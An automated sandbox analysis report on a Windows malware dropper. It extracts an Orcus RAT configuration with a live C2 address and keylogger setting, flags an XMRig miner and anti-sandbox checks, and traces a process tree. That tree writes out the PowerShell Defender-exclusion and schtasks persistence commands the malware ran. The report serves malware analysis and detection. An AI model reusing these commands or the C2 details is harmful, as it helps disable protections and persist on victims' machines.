Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
17-07-2021 08:03
Static task
static1
Behavioral task
behavioral1
Sample
a71f91351dc1bb57f0426080f2c03854.exe
Resource
win7v20210410
General
-
Target
a71f91351dc1bb57f0426080f2c03854.exe
-
Size
8.4MB
-
MD5
a71f91351dc1bb57f0426080f2c03854
-
SHA1
a336bd9298b0772f4d5764f695335fc7ef99755b
-
SHA256
f95e19a66cb1e3a612f2c07380376196e856dfefbe1038c4e6fd7d6a03388b5d
-
SHA512
dff5db2f6b3af11d10cb25c6e9df6df5bd4668ff54ba4ff1b6456ee7ab338e59297bad4d8722e7da15d175eabcd5833a632e5d62970d04993c733c379b7f4d19
Malware Config
Extracted
orcus
NewVPREFinal
67.242.2.35:10134
8185e643b7514e15b8dcfc7df7a8733b
-
autostart_method
TaskScheduler
-
enable_keylogger
true
-
install_path
%systemroot%\lsddsds\lsdds.exe
-
reconnect_delay
10000
-
registry_keyname
lsd
-
taskscheduler_taskname
lsdds
-
watchdog_path
Temp\olsdd.exe
Signatures
-
Orcus Main Payload 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe family_orcus C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe family_orcus \Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe family_orcus -
Looks for VirtualBox Guest Additions in registry 2 TTPs
-
Orcurs Rat Executable 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe orcus C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe orcus \Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe orcus -
XMRig Miner Payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/2224-354-0x00000001402EB66C-mapping.dmp xmrig behavioral1/memory/2224-356-0x0000000140000000-0x0000000140758000-memory.dmp xmrig -
Executes dropped EXE 20 IoCs
Processes:
python.exedcbl.exeex.exeec.exepython.exefrefef.exeVu.exeObus.exedefendernottray.exetrayfontdefender.exeWindowsInput.exesihost64.exeWindowsInput.exesihost32.exelsdds.exeolsdd.exelsdds.exeolsdd.exeasasasas.exedefendernottray.exepid process 1952 python.exe 1852 dcbl.exe 1700 ex.exe 288 ec.exe 1688 python.exe 1760 frefef.exe 864 Vu.exe 688 Obus.exe 2732 defendernottray.exe 3024 trayfontdefender.exe 2860 WindowsInput.exe 2892 sihost64.exe 976 WindowsInput.exe 2440 sihost32.exe 2544 lsdds.exe 2404 olsdd.exe 3032 lsdds.exe 2864 olsdd.exe 1800 asasasas.exe 1240 defendernottray.exe -
Looks for VMWare Tools registry key 2 TTPs
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
frefef.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion frefef.exe -
Loads dropped DLL 16 IoCs
Processes:
a71f91351dc1bb57f0426080f2c03854.exepython.exepython.exeex.exeec.exedefendernottray.exetrayfontdefender.exeolsdd.execmd.exesihost64.exepid process 2020 a71f91351dc1bb57f0426080f2c03854.exe 2020 a71f91351dc1bb57f0426080f2c03854.exe 2020 a71f91351dc1bb57f0426080f2c03854.exe 2020 a71f91351dc1bb57f0426080f2c03854.exe 1952 python.exe 2020 a71f91351dc1bb57f0426080f2c03854.exe 2020 a71f91351dc1bb57f0426080f2c03854.exe 2020 a71f91351dc1bb57f0426080f2c03854.exe 1688 python.exe 1700 ex.exe 288 ec.exe 2732 defendernottray.exe 3024 trayfontdefender.exe 2404 olsdd.exe 2468 cmd.exe 2892 sihost64.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 7 ip-api.com -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
frefef.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum frefef.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 frefef.exe -
Drops file in System32 directory 26 IoCs
Processes:
powershell.exeObus.exepowershell.exepowershell.exetrayfontdefender.exepowershell.exepowershell.exeec.exepowershell.exeWindowsInput.exedefendernottray.exepowershell.exepowershell.exesihost64.exepowershell.exeex.exepowershell.exepowershell.exepowershell.exedefendernottray.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\SysWOW64\WindowsInput.exe Obus.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created \??\c:\windows\system32\microsoft\telemetry\sihost32.log trayfontdefender.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created \??\c:\windows\system32\trayfontdefender.exe ec.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\SysWOW64\WindowsInput.exe.config Obus.exe File created \??\c:\windows\system32\microsoft\telemetry\sihost32.exe trayfontdefender.exe File created C:\Windows\SysWOW64\WindowsInput.InstallState WindowsInput.exe File created \??\c:\windows\system32\microsoft\libs\sihost64.log defendernottray.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created \??\c:\windows\system32\microsoft\libs\sihost64.exe defendernottray.exe File created \??\c:\windows\system32\microsoft\libs\WR64.sys defendernottray.exe File opened for modification \??\c:\windows\system32\defendernottray.exe sihost64.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created \??\c:\windows\system32\defendernottray.exe ex.exe File opened for modification \??\c:\windows\system32\defendernottray.exe ex.exe File opened for modification \??\c:\windows\system32\trayfontdefender.exe ec.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\system32\microsoft\libs\WR64.sys defendernottray.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
defendernottray.exedefendernottray.exedescription pid process target process PID 2732 set thread context of 2224 2732 defendernottray.exe explorer.exe PID 1240 set thread context of 2664 1240 defendernottray.exe explorer.exe -
Drops file in Windows directory 3 IoCs
Processes:
Obus.exedescription ioc process File created C:\Windows\lsddsds\lsdds.exe Obus.exe File opened for modification C:\Windows\lsddsds\lsdds.exe Obus.exe File created C:\Windows\lsddsds\lsdds.exe.config Obus.exe -
Detects Pyinstaller 5 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\python\python.exe pyinstaller C:\Users\Admin\AppData\Local\Temp\python\python.exe pyinstaller C:\Users\Admin\AppData\Local\Temp\python\python.exe pyinstaller C:\Users\Admin\AppData\Local\Temp\python\python.exe pyinstaller \Users\Admin\AppData\Local\Temp\python\python.exe pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2388 1760 WerFault.exe frefef.exe -
Checks SCSI registry key(s) 3 TTPs 1 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
frefef.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S frefef.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
frefef.exeVu.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 frefef.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString frefef.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 Vu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Vu.exe -
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2576 schtasks.exe 2596 schtasks.exe 2904 schtasks.exe 2620 schtasks.exe 2476 schtasks.exe 2308 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 1808 timeout.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
frefef.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosInformation frefef.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer frefef.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemProductName frefef.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Logical Unit Id 0 frefef.exe -
Processes:
frefef.exedefendernottray.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 frefef.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 defendernottray.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a defendernottray.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 frefef.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exeVu.exepowershell.exeex.exepowershell.exeec.exepowershell.exepowershell.exepowershell.exepowershell.exedefendernottray.exetrayfontdefender.exeWerFault.exepowershell.exepowershell.exepowershell.exedcbl.exepowershell.exeolsdd.exelsdds.exepid process 1336 powershell.exe 336 powershell.exe 1336 powershell.exe 336 powershell.exe 864 Vu.exe 864 Vu.exe 864 Vu.exe 1980 powershell.exe 1980 powershell.exe 1700 ex.exe 2212 powershell.exe 2212 powershell.exe 288 ec.exe 2356 powershell.exe 2356 powershell.exe 2020 powershell.exe 2020 powershell.exe 2492 powershell.exe 2492 powershell.exe 2776 powershell.exe 2732 defendernottray.exe 2776 powershell.exe 3024 trayfontdefender.exe 2388 WerFault.exe 2388 WerFault.exe 2388 WerFault.exe 2388 WerFault.exe 2388 WerFault.exe 2388 WerFault.exe 2388 WerFault.exe 960 powershell.exe 3008 powershell.exe 960 powershell.exe 3008 powershell.exe 864 Vu.exe 864 Vu.exe 2580 powershell.exe 2580 powershell.exe 1852 dcbl.exe 2584 powershell.exe 2584 powershell.exe 2864 olsdd.exe 2864 olsdd.exe 2544 lsdds.exe 2544 lsdds.exe 2544 lsdds.exe 2544 lsdds.exe 2864 olsdd.exe 2544 lsdds.exe 2864 olsdd.exe 2544 lsdds.exe 2864 olsdd.exe 2544 lsdds.exe 2864 olsdd.exe 2544 lsdds.exe 2864 olsdd.exe 2544 lsdds.exe 2864 olsdd.exe 2544 lsdds.exe 2864 olsdd.exe 2544 lsdds.exe 2864 olsdd.exe 2544 lsdds.exe 2864 olsdd.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
lsdds.exepid process 2544 lsdds.exe -
Suspicious use of AdjustPrivilegeToken 38 IoCs
Processes:
powershell.exeVu.exepowershell.exefrefef.exepowershell.exeex.exepowershell.exeec.exepowershell.exepowershell.exepowershell.exepowershell.exedefendernottray.exetrayfontdefender.exeWerFault.exepowershell.exepowershell.exedcbl.exepowershell.exelsdds.exepowershell.exeolsdd.exeolsdd.exeexplorer.exeasasasas.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedefendernottray.exeexplorer.exedescription pid process Token: SeDebugPrivilege 1336 powershell.exe Token: SeDebugPrivilege 864 Vu.exe Token: SeDebugPrivilege 336 powershell.exe Token: SeDebugPrivilege 1760 frefef.exe Token: SeDebugPrivilege 1980 powershell.exe Token: SeDebugPrivilege 1700 ex.exe Token: SeDebugPrivilege 2212 powershell.exe Token: SeDebugPrivilege 288 ec.exe Token: SeDebugPrivilege 2356 powershell.exe Token: SeDebugPrivilege 2020 powershell.exe Token: SeDebugPrivilege 2492 powershell.exe Token: SeDebugPrivilege 2776 powershell.exe Token: SeDebugPrivilege 2732 defendernottray.exe Token: SeDebugPrivilege 3024 trayfontdefender.exe Token: SeDebugPrivilege 2388 WerFault.exe Token: SeDebugPrivilege 960 powershell.exe Token: SeDebugPrivilege 3008 powershell.exe Token: SeDebugPrivilege 1852 dcbl.exe Token: SeDebugPrivilege 2580 powershell.exe Token: SeDebugPrivilege 2544 lsdds.exe Token: SeDebugPrivilege 2584 powershell.exe Token: SeDebugPrivilege 2404 olsdd.exe Token: SeDebugPrivilege 2864 olsdd.exe Token: SeLockMemoryPrivilege 2224 explorer.exe Token: SeLockMemoryPrivilege 2224 explorer.exe Token: SeDebugPrivilege 1800 asasasas.exe Token: SeDebugPrivilege 1800 asasasas.exe Token: SeDebugPrivilege 2868 powershell.exe Token: SeDebugPrivilege 1396 powershell.exe Token: SeDebugPrivilege 2032 powershell.exe Token: SeDebugPrivilege 2796 powershell.exe Token: SeDebugPrivilege 2948 powershell.exe Token: SeDebugPrivilege 2632 powershell.exe Token: SeDebugPrivilege 2004 powershell.exe Token: SeDebugPrivilege 1708 powershell.exe Token: SeDebugPrivilege 1240 defendernottray.exe Token: SeLockMemoryPrivilege 2664 explorer.exe Token: SeLockMemoryPrivilege 2664 explorer.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
lsdds.exepid process 2544 lsdds.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
lsdds.exepid process 2544 lsdds.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
lsdds.exepid process 2544 lsdds.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
a71f91351dc1bb57f0426080f2c03854.exepython.exeex.exeec.execmd.execmd.exeVu.execmd.exeObus.exedescription pid process target process PID 2020 wrote to memory of 1952 2020 a71f91351dc1bb57f0426080f2c03854.exe python.exe PID 2020 wrote to memory of 1952 2020 a71f91351dc1bb57f0426080f2c03854.exe python.exe PID 2020 wrote to memory of 1952 2020 a71f91351dc1bb57f0426080f2c03854.exe python.exe PID 2020 wrote to memory of 1952 2020 a71f91351dc1bb57f0426080f2c03854.exe python.exe PID 2020 wrote to memory of 1852 2020 a71f91351dc1bb57f0426080f2c03854.exe dcbl.exe PID 2020 wrote to memory of 1852 2020 a71f91351dc1bb57f0426080f2c03854.exe dcbl.exe PID 2020 wrote to memory of 1852 2020 a71f91351dc1bb57f0426080f2c03854.exe dcbl.exe PID 2020 wrote to memory of 1852 2020 a71f91351dc1bb57f0426080f2c03854.exe dcbl.exe PID 2020 wrote to memory of 1700 2020 a71f91351dc1bb57f0426080f2c03854.exe ex.exe PID 2020 wrote to memory of 1700 2020 a71f91351dc1bb57f0426080f2c03854.exe ex.exe PID 2020 wrote to memory of 1700 2020 a71f91351dc1bb57f0426080f2c03854.exe ex.exe PID 2020 wrote to memory of 1700 2020 a71f91351dc1bb57f0426080f2c03854.exe ex.exe PID 2020 wrote to memory of 288 2020 a71f91351dc1bb57f0426080f2c03854.exe ec.exe PID 2020 wrote to memory of 288 2020 a71f91351dc1bb57f0426080f2c03854.exe ec.exe PID 2020 wrote to memory of 288 2020 a71f91351dc1bb57f0426080f2c03854.exe ec.exe PID 2020 wrote to memory of 288 2020 a71f91351dc1bb57f0426080f2c03854.exe ec.exe PID 1952 wrote to memory of 1688 1952 python.exe python.exe PID 1952 wrote to memory of 1688 1952 python.exe python.exe PID 1952 wrote to memory of 1688 1952 python.exe python.exe PID 2020 wrote to memory of 1760 2020 a71f91351dc1bb57f0426080f2c03854.exe frefef.exe PID 2020 wrote to memory of 1760 2020 a71f91351dc1bb57f0426080f2c03854.exe frefef.exe PID 2020 wrote to memory of 1760 2020 a71f91351dc1bb57f0426080f2c03854.exe frefef.exe PID 2020 wrote to memory of 1760 2020 a71f91351dc1bb57f0426080f2c03854.exe frefef.exe PID 1700 wrote to memory of 1772 1700 ex.exe cmd.exe PID 1700 wrote to memory of 1772 1700 ex.exe cmd.exe PID 1700 wrote to memory of 1772 1700 ex.exe cmd.exe PID 288 wrote to memory of 1120 288 ec.exe cmd.exe PID 288 wrote to memory of 1120 288 ec.exe cmd.exe PID 288 wrote to memory of 1120 288 ec.exe cmd.exe PID 2020 wrote to memory of 864 2020 a71f91351dc1bb57f0426080f2c03854.exe Vu.exe PID 2020 wrote to memory of 864 2020 a71f91351dc1bb57f0426080f2c03854.exe Vu.exe PID 2020 wrote to memory of 864 2020 a71f91351dc1bb57f0426080f2c03854.exe Vu.exe PID 2020 wrote to memory of 864 2020 a71f91351dc1bb57f0426080f2c03854.exe Vu.exe PID 1772 wrote to memory of 1336 1772 cmd.exe powershell.exe PID 1772 wrote to memory of 1336 1772 cmd.exe powershell.exe PID 1772 wrote to memory of 1336 1772 cmd.exe powershell.exe PID 1120 wrote to memory of 336 1120 cmd.exe powershell.exe PID 1120 wrote to memory of 336 1120 cmd.exe powershell.exe PID 1120 wrote to memory of 336 1120 cmd.exe powershell.exe PID 2020 wrote to memory of 688 2020 a71f91351dc1bb57f0426080f2c03854.exe Obus.exe PID 2020 wrote to memory of 688 2020 a71f91351dc1bb57f0426080f2c03854.exe Obus.exe PID 2020 wrote to memory of 688 2020 a71f91351dc1bb57f0426080f2c03854.exe Obus.exe PID 2020 wrote to memory of 688 2020 a71f91351dc1bb57f0426080f2c03854.exe Obus.exe PID 1772 wrote to memory of 1980 1772 cmd.exe powershell.exe PID 1772 wrote to memory of 1980 1772 cmd.exe powershell.exe PID 1772 wrote to memory of 1980 1772 cmd.exe powershell.exe PID 864 wrote to memory of 2104 864 Vu.exe cmd.exe PID 864 wrote to memory of 2104 864 Vu.exe cmd.exe PID 864 wrote to memory of 2104 864 Vu.exe cmd.exe PID 2104 wrote to memory of 2196 2104 cmd.exe chcp.com PID 2104 wrote to memory of 2196 2104 cmd.exe chcp.com PID 2104 wrote to memory of 2196 2104 cmd.exe chcp.com PID 1120 wrote to memory of 2212 1120 cmd.exe powershell.exe PID 1120 wrote to memory of 2212 1120 cmd.exe powershell.exe PID 1120 wrote to memory of 2212 1120 cmd.exe powershell.exe PID 2104 wrote to memory of 2264 2104 cmd.exe netsh.exe PID 2104 wrote to memory of 2264 2104 cmd.exe netsh.exe PID 2104 wrote to memory of 2264 2104 cmd.exe netsh.exe PID 1772 wrote to memory of 2356 1772 cmd.exe powershell.exe PID 1772 wrote to memory of 2356 1772 cmd.exe powershell.exe PID 1772 wrote to memory of 2356 1772 cmd.exe powershell.exe PID 688 wrote to memory of 2400 688 Obus.exe csc.exe PID 688 wrote to memory of 2400 688 Obus.exe csc.exe PID 688 wrote to memory of 2400 688 Obus.exe csc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\a71f91351dc1bb57f0426080f2c03854.exe"C:\Users\Admin\AppData\Local\Temp\a71f91351dc1bb57f0426080f2c03854.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\python\python.exe"C:\Users\Admin\AppData\Local\Temp\python\python.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\python\python.exe"C:\Users\Admin\AppData\Local\Temp\python\python.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\AudioOutM\dcbl.exe"C:\Users\Admin\AppData\Local\Temp\AudioOutM\dcbl.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "asasasas" /tr '"C:\Users\Admin\AppData\Local\Temp\asasasas.exe"' & exit3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "asasasas" /tr '"C:\Users\Admin\AppData\Local\Temp\asasasas.exe"'4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp1870.tmp.bat""3⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\asasasas.exe"C:\Users\Admin\AppData\Local\Temp\asasasas.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\SecurityTrayManager\ex.exe"C:\Users\Admin\AppData\Local\Temp\SecurityTrayManager\ex.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "defendernottray" /tr '"c:\windows\system32\defendernottray.exe"' & exit3⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "defendernottray" /tr '"c:\windows\system32\defendernottray.exe"'4⤵
- Creates scheduled task(s)
-
C:\windows\system32\defendernottray.exe"C:\windows\system32\defendernottray.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
